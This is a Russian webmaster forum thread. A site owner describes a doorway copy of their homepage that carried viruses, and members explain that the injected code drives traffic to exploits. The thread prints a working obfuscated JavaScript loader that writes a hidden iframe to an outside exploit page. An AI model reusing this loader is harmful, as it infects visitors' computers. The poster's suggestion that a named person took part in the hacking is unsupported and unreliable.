Чужой дорвей на мой сайт с вирусом.

12
E
На сайте с 07.03.2007
Offline
32
1998

Реанимирую чужой сайт, включаю старый email.

Письма с вирусами градом. 60-80 шт. за день.

Такие завлекалочки, что уважение даже появилось к создателям этих писем.

Ну + письма со спамом, конечно.

Все тру аккуратно. Не отвечаю и не открываю ничего.

Писем с вирусами потихонечку уменьшается.

По теме за месяц 3 письма пришло.

Ответил. Вирусы пропали.

Развиваю неторопливо сайт, расставляю ключевые слова и т.д.

Неделю назад смотрю беки: новый неизвестный бек. Неплохая такая морда.

Вхожу - обана - копия моей морды. Дорвей на сайт :eek:

Вчера эта морда с вирусом.:mad: и не с одним.

Подцепил. Почистил.

В Whois кординаты липовые. Вычислил хозяина.

Письмо хозяину отправил чтобы затер дорвей. Не отвечает. Пид-р.

Зачем это кому надо?

Настучать Платону.

но я так понимаю хозяин сайта может вообще не знает что у него с сайтом творится.

Хакеры наверное балуются. Чем этот сайт насолил? Какие идеи?

Одна стрела сбивает одного орла. Две стрелы - это уже слишком много
MK
На сайте с 30.03.2005
Offline
67
#1

вполне может быть что ничем. тупое привлечение трафа на экспы

E
На сайте с 07.03.2007
Offline
32
#2

А вирусы на морде - это для трафика это зашибись?

MK
На сайте с 30.03.2005
Offline
67
#3

НА ЭКСПЫ, блин :)

E
На сайте с 07.03.2007
Offline
32
#4
mr. kiwi:
вполне может быть что ничем. тупое привлечение трафа на экспы

Поискал в поиске как переводится экспы - брошенные или чужие сайты, 2 значение (опыт) не подходит совсем. привлечение трафа на эксперементальные сайты.

Вечный стыд не знать. Спрашиваю - кто такие экспы?

эта морда С ВИРУСОМ www.gooroo.ru имеет 2 внутренние ссылки в никуда.

остальные все как были мои.

Но козлиная ее морда подвесила мне на сайт скрипт:

<!-- ~ --><script language='JavaScript'><!--

function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062';

s+='060105102114097109101032115114099061034104116116112058047047119109105103114097046111114103047115112';

s=s+'108111116047105110100101120046112104112034032119105100116104061034049034032104101105103104116061034';

s=s+'049034032102114097109101098111114100101114061034048034032060047105102114097109101062';

t='';l=s.length;i=0; while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp();

//--></script><!-- ~ -->

На целый вирус не похоже, меняет переменную и чего-то считает. Может часть вируса.

D
На сайте с 14.01.2007
Offline
153
#5
Erin:

На целый вирус не похоже, меняет переменную и чего-то считает. Может часть вируса.

скорей всего этот кусок добавляет на страницу iframe, в котором уже вирус грузится.

MK
На сайте с 30.03.2005
Offline
67
#6

эксп - это эксплоит, он же exploit - спец. код, который, используя какую-либо уязвимость твоего софта (в данном случае браузера), ставит тебе на комп себя и любой другой софт, в данном контексте вопроса. Более подробно - в википедии - http://ru.wikipedia.org/wiki/Exploit

а судя по коду, это как раз он самый и есть :)

response
На сайте с 01.12.2004
Offline
324
#7

чивот статья какая-то криво переведенная, или что-то с ней не так в общем:

Однако, возможно использовать несколько эксплойтов — первый для получения удаленного доступа с невысоким уровнем, и повторно, для локального повышения привилегий до тех пор, пока не будет получен уровень доступа « 0-дневными эксплойтами» (англ. zero-day, 0-day exploits) и получение доступа к таким эксплойтам — первейшее желание неквалифицированных вредоносных хакеров, так называемых скрипт-кидди.

то ли у автора с русским беда, то ли он не понимает, что такое 0-day.

Однопоточный парсер ключевых слов Магадан (http://magadanparser.ru) (со свистелками) Многопоточный парсер ключевых слов Солнечный (http://sunnyparser.ru) (без свистелок)
ArtInt
На сайте с 28.02.2007
Offline
61
#8

0-day эксплоит - эксплоит написанный под еще неизвестную общественности уязвимость или уязвимость о которой общественности стало известно относительно недавно. "Как бы" 0 дней назад.

Fiat lux!
E
На сайте с 07.03.2007
Offline
32
#9

новости:

gooroo точка ru изменилась. Как будто снесена.

Хозяин Ruslan Ostashko извинений не принес. Участвует наверное.

Является хозяином www.yandexmedia(точка)ru. Много визгов по поводу этого сайта

было.

gooroo точка ru сейчас участвует во взломе сайта федерального качначества РФ.

http://www.roskazna.ru/news_342.html

Ostashko спасибо, что снес сайт - письмо Платону не пришлось писать.

Уязвимости вычисляем, спасибо что указал.

mr. kiwi спасибо за разъяснения.

Rul
На сайте с 01.02.2006
Offline
108
Rul
#10
Erin:
новости:
gooroo точка ru изменилась. Как будто снесена.
Хозяин Ruslan Ostashko извинений не принес. Участвует наверное.
Является хозяином www.yandexmedia(точка)ru. Много визгов по поводу этого сайта
было.
gooroo точка ru сейчас участвует во взломе сайта федерального качначества РФ.
http://www.roskazna.ru/news_342.html

Ostashko спасибо, что снес сайт - письмо Платону не пришлось писать.
Уязвимости вычисляем, спасибо что указал.

mr. kiwi спасибо за разъяснения.

Что-то я не пойму. Что там было с сайтом gooroo ru ? И в чем участвует Осташко?

А что за визги по поводу яндексмедиа ? :)

Блог о музыке (http://www.rulaf.com/) | SEO blog (http://seo-kharkov.com/blog/) Dead Island (http://deadisland.ru/)
12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий